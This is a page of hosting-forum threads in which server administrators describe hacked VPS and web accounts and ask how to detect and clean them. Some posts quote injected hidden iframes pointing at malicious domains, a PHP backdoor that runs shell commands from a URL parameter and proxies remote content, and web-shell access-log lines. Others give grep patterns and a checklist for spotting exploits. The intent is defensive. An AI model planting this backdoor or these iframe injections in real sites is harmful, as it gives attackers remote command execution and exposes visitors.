Hacked Vps, To Many Files, How To Detect Hacker
May 6, 2009
Sometime ago the DC told me there was too many files on server and I started to investigate what is was and i got info that some one hacked the server and was sending spam from it.
When I looked at the accounts in Direct Admin some of them had the contact email to some hacker so i deleted the emails and changed password on the DA account and the email of those accounts.
Still I got too many files all the time so the server goes down so i have to delete the spoolfile all the time like 10 times a day
Please help how do I detect from what account do the hacker operate?
Can I detect that somehow?
Is it possible to do some small script to detect this?
Is there any advanced module to DA that gives me the info?
View 5 Replies
ADVERTISEMENT
Jul 2, 2009
I have a client that is certain someone is trying to hack her web-portal. I need to set up something that will alert me on suspicious activity on the server. For example someone fiddling with requests trying to make SQL / shell .. injection and similar threats.
Does any tool (for example bash script with grep) exist that would parse the raw apache logs and report if something is suspicious. Apache logs don't show the POST data so I am talking to admin to setup dump_io apache mod that enables this.
Or am I going into wrong direction here and there is whole another way to do this? I searched the web and forums for anything like this and didn't find anything.
View 4 Replies
View Related
Apr 30, 2009
we have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?
The problem:
On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.
Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.
On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.
We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.
What we have done to attempt to secure the server:
1) We have installed SuPhp.
2) We have ensured that all scripts on the affected websites are updated and running the latest versions.
3) We have changed all the passwords.
Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.
The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.
One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.
Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?
[url]
View 14 Replies
View Related
Sep 10, 2006
I was working on WHM of my server sudeenly i saw CPU load was increasing and till when i understand CPU load was on peak of 160%. I tried to find out CPU overloading sites and found that my 4 populer sites were creating problem. I stopped apache and suspanded all 4 sites and rebooted server. After forceful server reboot i found that load was getting normal to 2.5%. I unsuspanded one of 2 forums but even i unsuspanded that forum was not opening (IPB). I logged into ftp suspecting some problem i found that index.php was only 45bytes i have opend index.php and found this text inside .....
View 3 Replies
View Related
Jul 10, 2009
My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
/iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
View 14 Replies
View Related
Nov 8, 2007
I have noticed in a few Windows server tha the server gets hacked and there are tons of files which are mostly DVD rips and games being transferred away which results in huge amount of data transferred and bandwidth consumption increasing to as far as 29 Mbps. On further investigation, I find that all the files get stored in either the Recycler directory or the System Volume Information directories in any of the drives. Now these two directories are protected operating system files. Even if there is a windows firewall installed, there is no difference. I have even noticed that in some servers there is an automatic exception rule added in the windows firewall enabling the torrent client to communicate outside the server. This seems to be a common problem with Windows 2003 server and seems to be some backdoor of Windows allowing hackers to use the server for seeding. Has anybody come across such a problem or know the solution? Kindly help me with this.
View 14 Replies
View Related
Sep 8, 2007
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
View 5 Replies
View Related
Apr 14, 2007
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
How can I find their doorway?
View 4 Replies
View Related
Nov 13, 2008
For those who are still under the softlayer hacker abuse please note you will need to re-load your server. We got hit a 2nd time after thinking everything was clean. Anyhow, for those who got hit again, my team and another from WHT - forgot who made the original clean.php script...
anyhow, here is a tool to clean all the data for all of your users:Copy fixit.pl and clean4.php to a directory. IE: /home/yourusername
Change username "changeme" in fixit.pl to the username where clean4.php is located
execute fixit.pl: IE: perl fixit.pl. If you want to test this on one user uncomment the die statement. When you are ready to do the entire server comment the die statement.
fixit.pl (perl script) Author: Robert Saylor
#!/usr/bin/perl$config{'basepath'} .....
View 0 Replies
View Related
Apr 12, 2008
i've got a couple of vps accounts and one got hacked today, i received a domain creation email for a domain i didn't create, password was "hackedonlyhost" and contact was not my email but someone elses. Root password was changed etc etc, but i managed to get control of the vps again.
Why am i posting this in the ded forum? because the email in the account setup was for a hosting company. I traced the ip to LT. I've found this guy on a couple of hacker forums (arabic, he's in egypt) also using his email at his hosting company.
So, whilst he may not be breaking LT rules at all do i bother contacting them to say they are providing services to hacker?
View 6 Replies
View Related
Aug 11, 2008
There Is Some Way That Hacker use a .htaccess file to change the php Version On The Server To use the Exploit
Look I Run A php Shell From My Server
[url]
You Can See From The picture that my php version is 5.2.6
then I Have upload the .htaccess To My server
the Version has been changed
look to other picture
[url]
You Can see The .htaccess file
And This Way Only Work If I have More Than one php Version on my server
How Can I Secure My server From This Way
View 2 Replies
View Related
May 18, 2009
I'm still trying to figure this one out. I got an email last night about 10:30pm that a weird IP had logged with root. I thought it was a guy that helps with tech things but I ran the IP... it came back from Korea and I knew I was in trouble. I immediately logged into WHM and changed the root password then sent the server down for a reboot. He was only in there for about 3 minutes before I nailed him. I've banned the IP from the server and have been watching it for nearly 12 hours now and they haven't came back yet.
Now comes the task of trying to figure out how he got the password. This is mind boggling to me. He knew the password, like someone gave it to him... there were no incorrect guesses or brute force. The password was a series of random letters, both upper and lower case. Is it possible he got it through getting to /etc/passwd via a PHP script? I have open basedir restrictions in place, can they get around that? I noticed at the time he logged in there were several IPs trying to exploit PHP scripts on my server, you know, setting the parameters to txt files but I assumed with shell functions disabled (except exec) and with open basedir this wouldn't be possible. Is there a hole in cpanel / PHP / kernel recently I may have missed?
View 14 Replies
View Related
Mar 25, 2008
As with many sites. my site was hacked recently. my host was so negative about this. they didn't notice the hack attempt although it took the hacker 9 hours to break through.
after that I made some search on my host to find that it is not a real host at all. they are just resellers to another company. I was very disappointed, Then I decided to go to a better host who can protect me from hackers.
I read some threads about 'hacker safe host' but they all in general don't give a real name of trusted 'anti-hackers' companies.
can you guide me to some of the famous hosts?
if you can't my friends got a VPS hosted with WestHost. he offered me to move my site to his VPS. is west host trusted about hackers?
View 14 Replies
View Related
Jun 19, 2007
My server is generating a lot of this logs and taking too much RAM of my server in the SQL process
How can I block an IP adress ?
Log Description:
Login failed for user 'sa'. [CLIENT: 199.227.13.134]
For more information, see Help and Support Center at [url]
View 9 Replies
View Related
Aug 25, 2007
I was checking my business server's IIS errors logs when I ran across the following error:
2007-05-19 08:21:10 00.000.000.00 2243 00.000.000.000 80 HTTP/1.1 GET
/w00tw00t.at.ISC.SANS.DFind 400 - Hostname -
Additional information about the those responsible for the hack attempts are as follows
(retrieved from domaintools.com):
CustName: ----------------(hidden by me)
Address: Private Address
City: Plano
StateProv: TX
PostalCode: 75075
Country: US
RegDate: 2005-08-27
Updated: 2005-08-27
Apparently this person was trying to use the dfind hacker tool to find vulnerabilities on my server. The IP address belongs to AT&T Yahoo; and I've already contacted them by email. I believe that subsequent hack attempts have originated from this IP, however, the IP address has been masked by the use of proxies. I think that this may be someone I know because the IP is only about an hours drive from me. I'm starting to suspect a disgruntled former client who has friends living where that IP's from.
Has anyone here had any similar experiences?
What do you think AT&T Yahoo's response will be?
Is there anything else I can do or should not do?
I am also considering reimaging my server because of system issues but I am concerned that would erase any information needed for investigative purposes. I have saved my log files, though, on a CD but I'm thinking that AT&T Yahoo or whoever investigates this needs the server as it is.
View 8 Replies
View Related
Jul 13, 2009
I want to ask about some tips to prevent my blog from hacker attack. My friends experience this and i dont want this happen to me. Is web hosting technical support can fix my host server if hacker break it out?
View 10 Replies
View Related
Jan 5, 2008
I'm having a problem with a hacker...using insecure scripts on my user's accounts he changes Cpanel passwords. I do not understand how a script running as user nobody would change a Cpanel password. Any ideas on that ?
I am using mod security (rules from gotroot.com), register_globals are disabled. I also disabled the password reset feature as I thought the hacker may be resetting the passwords and then reading the new password from the email account on the server using the insecure script.
Unfortunately this guy simply doesn't stop...he seems to have a reverse DNS list or something. He is only attacking accounts on one specific server of mine but I am pretty sure he doesn't have root access.
View 7 Replies
View Related
May 7, 2008
It seems like someone has hacked into my server, and all of the pages for one of my domains are showing errors.
Each page on my site is showing a PHP inclusion error, each file on my site is trying to include an unknown file /tmp/blah.php for example which doesn't exist on my site, therefore creating errors and not showing my site.
I checked my site in ftp, it isn't in the code. So it is definitely in a server file somewhere.
What could be doing this? Its for a single domain only, I've created the file it is trying to include as a temporary fix, I have checked php.ini and there seems no reference to the included file there.
View 3 Replies
View Related
Mar 15, 2008
I have two reseller accounts with Innohosting and a hacker has got into several sites on both accounts. I have contacted Innohosting and hopefully will get an explanation soon.
But as this is very serious, I want to put it out on this forum also.
At first I thought they must have cracked my FTP access, but they have got into several sites on both reseller accounts so they must have gained access to the server itself, I suspect.
how to stop these lowlifes striking
View 14 Replies
View Related
Jan 18, 2007
I just have someone uploading file via php on a website, i need a way to block that kind of attack via mod security?
can add in mod security to avoid this?
89.146.147.144 - - [17/Jan/2007:12:24:11 -0600] "GET /favicon.ico HTTP/1.1" 404 1002 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.146.147.144 - - [17/Jan/2007:12:24:23 -0600] "GET /XXXX/index.php?x=************.***?&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/&newdir=bh HTTP/1.1" 200 154634 [url]
x=************.***??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.146.147.144 - - [17/Jan/2007:12:24:32 -0600] "GET /XXXX/index.php?x=************.***?&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/ HTTP/1.1" 200 7444 [url
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.146.147.144 - - [17/Jan/2007:12:24:41 -0600] "GET /XXXX/index.php?x=************.***?&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/&newdir=************.*** HTTP/1.1" 200 8422 [url]
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
View 4 Replies
View Related
Nov 1, 2014
my VPS hosted by Strato was hacked and seems to be part of a botnet now. Until now I thought that the automatic backups of the provider would be enough and I did no separate backups using pleskbackup. Unfortunately the hacker attack was earlier than my oldest backup.
Now I want to move the complete server content including the configuration of approx. 10 domains to a new one. Therefore I want to make a backup of the plesk 9.5 server using pleskbackup to import it on the new server running plesk 12.I can access the old server in recovery mode only, which means, that a recovery system runs with the content of the old server mounted under /repair. Is there a possibility to tell pleskbackup, that the content to backup is mounted under /repair? Otherwise it seems, that I have to move the content manually...(I tried starting the old server in normal mode, but it immediately starts doing evil things, so this doesn't seem a good option...)
View 4 Replies
View Related
Apr 21, 2009
How do you know your clients are sending bulk/spam emails?
I don't seem to understand the reports in "Email >> View Mail Statistics" section of WHM.
View 5 Replies
View Related
Jul 25, 2009
I have a private vps server works under linux ( centos ), sometimes am getting msg from csf/firewall subject:
lfd on website.com: Suspicious process running under user user account
when i check my cpanel/whm vps ( service status ) its shows that the memory limit 80% - 85% , It's had a good forum works with vb, but am wonder how to check my vps memory, i mean how to detect if there any script, or malware, or anything takes the vps memory out...
Is there any way to check,know what works under my vps, so it's take my memory limit 85%?
i check the tmp folder,
root@www [/home]# cd /tmp
root@www [/tmp]# ls -la
total 364
drwxrwxrwt 6 root root 4096 Jul 25 02:14 ./
drwxr-xr-x 21 root root 4096 Jul 18 02:21 ../
drwxrwxrwt 2 root root 4096 Jun 30 05:50 .ICE-unix/
drwxrwxrwx 18 root root 4096 Jul 2 17:33 eaccelerator/
lrwxrwxrwx 1 root root 27 Jul 18 02:13 mysql.sock -> ../var/lib/mysql/mysql.sock=
drwxr-xr-x 3 root root 4096 Jun 30 05:29 pear/
drwx------ 3 root root 4096 Jul 5 18:31 spamd-23647-init/
-rw------- 1 root root 343335 Jul 19 02:50 whatis.bk6140
root@www [/tmp]# cd /home
and the df space
root@www [~]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 80G 4.1G 76G 6% /
root@www [~]#
and the services running is
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2060 156 ? Ss Jun30 1:23 init [3]
root 7465 0.0 0.0 2444 156 ? S Jul03 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --pid-file=/var/lib/mysql/www.website.com.pid
mysql 7491 0.0 2.5 33452 10440 ? Sl Jul03 11:33 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/www.website.com.pid --skip-external-locking
root 10236 0.0 6.0 27396 24764 ? Ss Jul24 0:07 /usr/bin/spamd -d --allowed-ips=127.0.0.1 --pidfile=/var/run/spamd.pid --max-children=3 --max-spare=1
root 11447 0.0 1.9 18364 8020 ? S Jul24 0:00 cpsrvd - waiting for connections
root 11865 0.0 0.7 13672 3260 ? S Jul06 0:00 /usr/local/apache/bin/httpd -k start -DSSL
root 13537 0.0 3.1 15092 13064 ? Ss 00:00 0:02 lfd - sleeping
root 13703 0.0 0.3 3808 1284 ? SN Jul06 0:01 cpanellogd - sleeping for logs
root 13739 0.0 0.6 5856 2844 ? Ss Jul06 0:00 cPhulkd - processor
root 13795 0.0 1.5 14760 6304 ? S Jul06 0:00 cpdavd - accepting connections on 2077 and 2078
root 18161 0.0 0.0 1716 380 ? Ss Jun30 0:24 syslogd -m 0
root 18164 0.0 0.0 1668 72 ? Ss Jun30 0:00 klogd -x
dbus 18193 0.0 0.0 2736 212 ? Ss Jun30 0:00 dbus-daemon --system
root 18213 0.0 0.0 2716 172 ? Ss Jun30 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root 18399 0.0 5.9 27604 24404 ? S Jul24 0:06 spamd child
root 19461 0.0 0.1 3228 684 ? Ss Jun30 0:08 crond
root 19616 0.0 0.0 1820 124 ? Ss Jun30 0:00 /usr/sbin/portsentry -
View 7 Replies
View Related
May 4, 2008
My server run after 10h sevices ftp is down (network error: connection timed out). may be flood ftp.
how to Detect flood ftp.
View 4 Replies
View Related
May 22, 2007
I have a few incomplete steps to see if I got some intruder in my Linux system.. But i really would like to have all your suggestions to make a good doc about this matter,
1.- Download and run Rkhunter & Chkrootkit
2.- Run "w", and "netstat -nalp |grep "SHPORTHERE" to see whos connected using SSH
3.- Search for ssh and ftp accepted logins.
Code:
last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* |grep ftp |grep Accept
less /var/log/messages | grep ftp
4.- Watch current connections and scan your ports.
Code:
netstat -nalp
nmap 1-65535 localhost
5.- Search for suspicious content on common explotable dirs.
Code:
rm -rf /tmp/sess*
rm -rf /var/dos-*
rm -rf /var/tmp/ssh-*
rm -rf /var/tmp/dos-*
ls /tmp -lab
ls /var/tmp -labR
ls /dev/shm -labR
ls /usr/local/apache/proxy -labR
ls /usr/local/samba -labR
6.- Checking for anomalies on this files.
Code:
less /etc/passwd
less /etc/shadow
less /etc/groups
7.- Search for new users at sudoers, check wtmp and telnet is not running.
Code:
cat /etc/sudoers
who /var/log/wtmp
cat /etc/xinetd.d/telnet
8.- Find bash history files
Code:
find '/' -iname .bash_history
9 .- Verify the Crontab table
Code:
crontab -l
10 .- Update the slocate database and search for exploits.
Code:
updatedb &
For cPanel servers:
Code:
egrep -i '(chr(|system()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
egrep -i '(chr(|system()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
For Ensim servers:
Code:
egrep -i '(chr(|system()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*
Search for shell code:
Code:
cat /path/of/your/web/logs/* |grep "/x90/"
11.- Search for hidden dirs
Code:
locate "..."
locate ".. "
rlocate " .."
locate ". "
locate " ."
12.- Search for perl-scripts running
Code:
ps -aux | grep perl
13 .- Checking nobody user and open files.
Code:
service httpd stop
lsof -u nobody
View 14 Replies
View Related
Jun 4, 2008
I am starting a online sotre. Someone told me to keep third party seals for good response.
Please recommend me which seals to be used
Hacker Safe, TRUSTe, BBB, and Trust Guard
I think Trust Guard seal give a multi package for all security,privacy and business verification. Shall people know it? Is it worth money?
View 0 Replies
View Related
Apr 6, 2009
I have a server of my own. Unfortunatlly 20% of the time, the server is down even though my connection to internet always up.
I am checking the event log but cannot see anything odd...
OS:Windows server 2003
Is there any tool to detect why the server is down most of the time?
I can post the event viewer errors that I can find suspeicious if needed.
View 2 Replies
View Related
May 19, 2009
is there any proved method to determine what kind of attack you are under? Our server has been under attack for more than a day now but so far we have not been able to find out what kind of attack it is exactly. The server maintence company we are using says it's a DDoS attack but they don't say how they found this out. Also, they are not telling us what kind of DDoS attack it is.
View 14 Replies
View Related
Jul 31, 2009
i have some issue,
sometimes,a user may be banned by our firewall,
or the dns of his pc does not work well,...and so on,
by the way,
they can not link to server,
and it spend a lot of time to check where is wrong from his pc aside.
i want to ask if it is possible i use a php script or a exe let him to execute,
and it will help me detect user's pc configuation,
it include his IP/DNS/fateway/trace and ping result,...and so on.
View 4 Replies
View Related
Jul 25, 2008
Is there any way to distinguish a dedicated server from VPS using Linux commands and detect the implemented virtualization technology like XEN and OpenVZ, ...?
I have received a dedicated server and in cPanel its written Virtuozzo but they tell me it's XEN , beside this what's the reason to implement a virtualization technic while they give me a dedicated server? Maybe to obtain cheaper cPanel license,
View 8 Replies
View Related
Nov 13, 2008
Do web hosts have the means to self-detect or self-correct problems with people's websites? If so, is there a name for this ability?
Seems that every host I've used has to be *told* about major problems, such as the server or database being down completely. I'm tired of going out of town fearing a site crash. I don't expect them to catch every problem, but when the failure is so blatant, it would be nice if they caught it...
How would I find a host who does this?
View 11 Replies
View Related
